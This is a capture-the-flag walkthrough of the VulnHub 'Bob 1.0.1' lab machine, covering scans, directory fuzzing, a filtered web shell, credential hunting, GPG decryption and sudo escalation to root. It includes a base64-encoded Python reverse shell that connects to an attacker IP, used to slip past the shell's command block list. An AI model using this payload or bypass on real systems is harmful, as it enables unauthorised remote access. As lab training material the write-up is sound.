Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Nmap 7.92 scan initiated Sat Jan 22 15:05:40 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Bob1.0.1/192.168.236.5/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Bob1.0.1/192.168.236.5/scans/xml/_full_tcp_nmap.xml 192.168.236.5
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
adjust_timeouts2: packet supposedly had rtt of -919297 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -919297 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -919297 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -919297 microseconds. Ignoring time.
Nmap scan report for 192.168.236.5
Host is up, received arp-response (0.00064s latency).
Scanned at 2022-01-22 15:05:41 +08 for 18s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
25468/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCt2rmQKSTx+fbTOy3a0DG0GI5KOP+x81YHI31kH8V+gXu+BhrvzTtvQbg/KUaxkxNXirQKm3v23b/BNGLm2EmG28T8H1kisT5LhmfJ+w1X/Y7xnXiTYxwxKWF8NHMsQGIKWB8bCPK+2LvG3MdF6cKniSIiT8C8N66F6yTPQyuW9z68pK7Zj4wm0nrkvQ9Mr++Kj4A4WIhxaYd0+hPnSUNIGLr+XC7mRVUtDSvfP0RqguibeQ2yoB974ZTF0uU0Zpq7BK8/loAl4nFu/6vwLU7BjYm3BlU3fvjDNlSwqbsjwgn/kTfySxZ/WiifZW3U1WLLdY4CQZ++nR2odDNy8YQb
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIntdI8IcX2n63A3tEIasPt0W0Lg31IAVGyzesYMblJsc1zM1jmaJ9d6w6PpZKa+7Ow/5yXX2DOF03pAHXP1S5A=
| 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMmbgZpOuy0D5idStSgBUVb4JjRuAdv/7XF5dGDJgUqE
MAC Address: 08:00:27:F6:19:B5 (Oracle VirtualBox virtual NIC)
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.13 (93%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (93%), Linux 4.10 (93%), Linux 3.2 - 3.10 (92%), Linux 3.2 - 3.16 (92%), Linux 3.10 - 4.11 (92%), Linux 3.16 - 4.6 (91%), Linux 2.6.32 (91%), Linux 2.6.32 - 3.10 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=1/22%OT=80%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61EBACD7%P=x86_64-pc-linux-gnu)
SEQ(TI=Z%CI=I%II=I%TS=8)
SEQ(SP=105%GCD=3%ISR=104%TI=Z%CI=RD%II=I%TS=8)
OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=N)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=N)
T6(R=Y%DF=Y%TG=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 198.839 days (since Wed Jul 7 18:58:16 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.236.5
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 22 15:05:59 2022 -- 1 IP address (1 host up) scanned in 19.42 seconds
NMAP
- tcp/80
- tcp/25468 (SSH)
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root💀kali)-[~/vulnHub/Bob1.0.1]
└─# ffuf -u http://192.168.236.5/FUZZ -w /usr/share/wordlists/dirb/common.txt -e ".html,.txt,.php" -fw 22
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.236.5/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 22
________________________________________________
about.html [Status: 200, Size: 2579, Words: 687, Lines: 91]
contact.html [Status: 200, Size: 3145, Words: 1078, Lines: 149]
index.html [Status: 200, Size: 1425, Words: 413, Lines: 70]
login.html [Status: 200, Size: 1560, Words: 442, Lines: 74]
news.html [Status: 200, Size: 4086, Words: 1168, Lines: 153]
passwords.html [Status: 200, Size: 673, Words: 103, Lines: 31]
robots.txt [Status: 200, Size: 111, Words: 6, Lines: 6]
:: Progress: [18460/18460] :: Job [1/1] :: 217 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
passwords.html
robots.txt
Initial Foothold
TCP/80 (HTTP)
- View
robots.txt
1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Bob1.0.1] └─# curl http://192.168.236.5/robots.txt User-agent: * Disallow: /login.php Disallow: /dev_shell.php Disallow: /lat_memo.html Disallow: /passwords.html
- Proceed to enumerated directories
/login.php
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/vulnHub/Bob1.0.1] └─# curl http://192.168.236.5/login.php <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /login.php was not found on this server.</p> <hr> <address>Apache/2.4.25 (Debian) Server at 192.168.236.5 Port 80</address> </body></html>
/dev_shell.php
/lat_memo.html
- “Webshell running on the server, ported over the filter from the old windows server”
/passwords.html
- Proceed to
login.html
- Disabled
- Proceed to
/dev_shell.php
, figure out words that are filtered- Start HTTP Server
- Download the files & analyze the source code
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root💀kali)-[~/vulnHub/Bob1.0.1/192.168.236.5/loot] └─# wget 192.168.236.5:8181/dev_shell.php --2022-01-22 15:44:26-- http://192.168.236.5:8181/dev_shell.php Connecting to 192.168.236.5:8181... connected. HTTP request sent, awaiting response... 200 OK Length: 1396 (1.4K) [application/octet-stream] Saving to: ‘dev_shell.php’ dev_shell.php 100%[==============================================>] 1.36K --.-KB/s in 0s 2022-01-22 15:44:26 (229 MB/s) - ‘dev_shell.php’ saved [1396/1396]
- Filtered
"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc",";"
- Filtered
- Start HTTP Server
- Bypass filter by encoding payload
- Encode Payload
- Final Payload
1
echo -n cHl0aG9uIC1jICdhPV9faW1wb3J0X187cz1hKCJzb2NrZXQiKS5zb2NrZXQ7bz1hKCJvcyIpLmR1cDI7cD1hKCJwdHkiKS5zcGF3bjtjPXMoKTtjLmNvbm5lY3QoKCIxOTIuMTY4LjIzNi40Iiw0NDQ0KSk7Zj1jLmZpbGVubztvKGYoKSwwKTtvKGYoKSwxKTtvKGYoKSwyKTtwKCIvYmluL3NoIikn | base64 -d | sh
- Obtain www-data shell
1 2 3 4 5 6 7 8 9 10
┌──(root💀kali)-[~/vulnHub/Bob1.0.1/192.168.236.5/loot/http] └─# nc -nvlp 4444 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.236.5. Ncat: Connection from 192.168.236.5:57636. $ whoami whoami www-data
- Encode Payload
Privilege Escalation
Elliot - Via Creds Found
- Look for
.txt
&pass
files in/home
1 2 3 4 5 6
www-data@Milburg-High:/home$ find $(pwd) 2>/dev/null | grep -P ".txt|pass" /home/bob/.old_passwordfile.html /home/bob/Documents/staff.txt /home/bob/Documents/login.txt.gpg .... /home/elliot/theadminisdumb.txt
- View enumerated files
.old_passwordfile.html
1 2 3 4 5 6 7
www-data@Milburg-High:/$ more /home/bob/.old_passwordfile.html <html> <p> jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M3 </p> </html>
- seb:
T1tanium_Pa$$word_Hack3rs_Fear_M3
- jc:Qwerty
- seb:
/home/bob/Documents/staff.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
www-data@Milburg-High:/home$ cat /home/bob/Documents/staff.txt Seb: Seems to like Elliot Wants to do well at his job Gave me a backdoored FTP to instal that apparently Elliot gave him James: Does nothing Pretty Lazy Doesn't give a shit about his job Elliot: Keeps to himself Always needs to challenge everything I do Keep an eye on him Try and get him fired
/home/bob/Documents/login.txt.gpg
1 2 3 4
www-data:/$ more /home/bob/Documents/login.txt.gpg o��J[V0w�q�OS�bob@Milburg-High:/$ file /home/bob/Documents/login.txt.gpg /home/bob/Documents/login.txt.gpg: GPG symmetrically encrypted data (AES cipher) bob@Milburg-High:/$
- symmetrically encrypted, no need for private key, only passphrase needed.
/home/elliot/theadminisdumb.txt
1 2 3
www-data@Milburg-High:/home$ cat /home/elliot/theadminisdumb.txt The admin is dumb,.........SNIP theadminisdumb
- elliot:theadminisdumb
- Switch to seb, jc, elliot, could not enumerate/find ways to root
- Proceed to
/home/bob/Documents
1 2 3 4 5 6 7
jc@Milburg-High:~/Documents$ ls -la total 20 drwxr-xr-x 3 bob bob 4096 Mar 5 2018 . drwxr-xr-x 18 bob bob 4096 Mar 8 2018 .. -rw-r--r-- 1 bob bob 91 Mar 5 2018 login.txt.gpg drwxr-xr-x 3 bob bob 4096 Mar 5 2018 Secret -rw-r--r-- 1 bob bob 300 Mar 4 2018 staff.txt
- Look for suspicious files
1 2 3 4 5 6 7 8 9 10 11 12 13 14
jc@Milburg-High:~/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ sh notes.sh -= Notes =- Harry Potter is my faviorite Are you the real me? Right, I'm ordering pizza this is going nowhere People just don't get me Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here> Cucumber Rest now your eyes are sleepy Are you gonna stop reading this yet? Time to fix the server Everyone is annoying Sticky notes gotta buy em bob@Milburg-High:~/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$
- HARPOCRATES
- Decrypt
login.txt.gpg
1 2 3 4 5 6 7 8 9 10 11 12
jc@Milburg-High:/tmp$ gpg --decrypt /home/bob/Documents/login.txt.gpg gpg: AES encrypted data gpg: problem with the agent: Permission denied <-- ERROR gpg: encrypted with 1 passphrase gpg: decryption failed: No secret key bob@Milburg-High:/tmp$ gpg --decrypt /home/bob/Documents/login.txt.gpg^C jc@Milburg-High:/tmp$ gpg --decrypt --pinentry-mode=loopback /home/bob/Documents/login.txt.gpg gpg: AES encrypted data gpg: encrypted with 1 passphrase bob:b0bcat_ bob@Milburg-High:/tmp$ ls
1 2 3 4 5
# OR jc@Milburg-High:/tmp$ gpg --batch --passphrase HARPOCRATES -d /home/bob/Documents/login.txt.gpg gpg: AES encrypted data gpg: encrypted with 1 passphrase bob:b0bcat_
- bob:b0bcat_
- Fix the error: https://askubuntu.com/questions/1080204/gpg-problem-with-the-agent-permission-denied
- Switch to bob w/ bob:b0bcat_
Root - Via Sudo
- Check sudo access
1 2 3 4 5 6 7 8 9
bob@Milburg-High:/tmp$ sudo -l sudo: unable to resolve host Milburg-High: Connection refused [sudo] password for bob: Matching Defaults entries for bob on Milburg-High: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User bob may run the following commands on Milburg-High: (ALL : ALL) ALL bob@Milburg-High:/tmp$
- Obtain root shell
- Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
root@Milburg-High:/# cat flag.txt CONGRATS ON GAINING ROOT .-. ( ) |~| _.--._ |~|~:'--~' | | | : #root | | | : _.--._| |~|~`'--~' | | | | | | | | | | | | | | | | | | _____|_|_________ Thanks for playing ~c0rruptedb1t
Comments powered by Disqus.